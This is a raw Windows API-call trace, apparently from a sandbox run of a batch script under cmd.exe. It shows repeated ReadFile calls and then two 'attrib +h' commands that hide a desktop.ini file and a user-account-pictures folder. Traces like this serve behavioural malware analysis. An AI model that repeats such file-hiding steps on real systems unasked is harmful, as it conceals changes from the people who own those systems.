lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.021] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.022] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.023] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.024] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.025] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0178.094] _close (_FileHandle=4) returned 0 [0178.094] FindNextFileW (in: hFindFile=0x281488, lpFindFileData=0x14ee20 | out: lpFindFileData=0x14ee20) returned 0 [0178.095] GetLastError () returned 0x12 [0178.095] FindClose (in: hFindFile=0x281488 | out: hFindFile=0x281488) returned 1 [0178.095] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0178.097] _close (_FileHandle=3) returned 0 [0178.097] GetConsoleTitleW (in: lpConsoleTitle=0x14f258, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.098] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.098] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.098] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.098] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.098] GetLastError () returned 0x2 [0178.098] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.098] GetLastError () returned 0x2 [0178.098] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0x281488 [0178.098] FindClose (in: hFindFile=0x281488 | out: hFindFile=0x281488) returned 1 [0178.098] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.099] GetLastError () returned 0x2 [0178.099] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0x281488 [0178.099] FindClose (in: hFindFile=0x281488 | out: hFindFile=0x281488) returned 1 [0178.099] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.099] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.099] GetConsoleTitleW (in: lpConsoleTitle=0x14efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.099] InitializeProcThreadAttributeList (in: lpAttributeList=0x14ee74, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14ef3c | out: lpAttributeList=0x14ee74, lpSize=0x14ef3c) returned 1 [0178.099] UpdateProcThreadAttribute (in: lpAttributeList=0x14ee74, dwFlags=0x0, Attribute=0x60001, lpValue=0x14ef34, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14ee74, lpPreviousValue=0x0) returned 1 [0178.099] GetStartupInfoW (in: lpStartupInfo=0x14ee30 | out: lpStartupInfo=0x14ee30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0178.099] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.099] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14eed0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14ef1c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" ", lpProcessInformation=0x14ef1c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xbfc, dwThreadId=0xc30)) returned 1 [0178.101] CloseHandle (hObject=0x50) returned 1 [0178.101] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.101] GetEnvironmentStringsW () returned 0x282e28* [0178.101] FreeEnvironmentStringsW (penv=0x282e28) returned 1 [0178.101] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0178.271] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x14ee10 | out: lpExitCode=0x14ee10*=0x0) returned 1 [0178.271] CloseHandle (hObject=0x4c) returned 1 [0178.271] _vsnwprintf (in: _Buffer=0x14ef58, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ee1c | out: _Buffer="00000000") returned 8 [0178.271] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0178.271] GetEnvironmentStringsW () returned 0x282e28* [0178.271] FreeEnvironmentStringsW (penv=0x282e28) returned 1 [0178.271] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0178.271] GetEnvironmentStringsW () returned 0x282e28* [0178.271] FreeEnvironmentStringsW (penv=0x282e28) returned 1 [0178.271] DeleteProcThreadAttributeList (in: lpAttributeList=0x14ee74 | out: lpAttributeList=0x14ee74) [0178.271] GetConsoleTitleW (in: lpConsoleTitle=0x14f258, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.271] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.271] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.271] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.272] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.272] GetLastError () returned 0x2 [0178.272] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.272] GetLastError () returned 0x2 [0178.272] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0x281488 [0178.272] FindClose (in: hFindFile=0x281488 | out: hFindFile=0x281488) returned 1 [0178.272] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0xffffffff [0178.272] GetLastError () returned 0x2 [0178.272] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0x281488 [0178.272] FindClose (in: hFindFile=0x281488 | out: hFindFile=0x281488) returned 1 [0178.273] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.273] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.273] GetConsoleTitleW (in: lpConsoleTitle=0x14efec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.273] InitializeProcThreadAttributeList (in: lpAttributeList=0x14ee74, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14ef3c | out: lpAttributeList=0x14ee74, lpSize=0x14ef3c) returned 1 [0178.273] UpdateProcThreadAttribute (in: lpAttributeList=0x14ee74, dwFlags=0x0, Attribute=0x60001, lpValue=0x14ef34, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14ee74, lpPreviousValue=0x0) returned 1 [0178.273] GetStartupInfoW (in: lpStartupInfo=0x14ee30 | out: lpStartupInfo=0x14ee30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0178.273] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.273] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14eed0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14ef1c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"", lpProcessInformation=0x14ef1c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc64, dwThreadId=0xc20)) returned 1 [0178.274] CloseHandle (hObject=0x4c) returned 1 [0178.274] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.274] GetEnvironmentStringsW () returned 0x2838d0* [0178.274] FreeEnvironmentStringsW (penv=0x2838d0) returned 1 [0178.274] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0178.382] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x14ee10 | out: lpExitCode=0x14ee10*=0x0) returned 1 [0178.382] CloseHandle (hObject=0x50) returned 1 [0178.382] _vsnwprintf (in: _Buffer=0x14ef58, _BufferCount=0x13, _Format="%08X", _ArgList=0x14ee1c | out: _Buffer="00000000") returned 8 [0178.382] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0178.382] GetEnvironmentStringsW () returned 0x2838d0* [0178.382] FreeEnvironmentStringsW (penv=0x2838d0) returned 1 [0178.382] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0178.382] GetEnvironmentStringsW () returned 0x2838d0* [0178.382] FreeEnvironmentStringsW 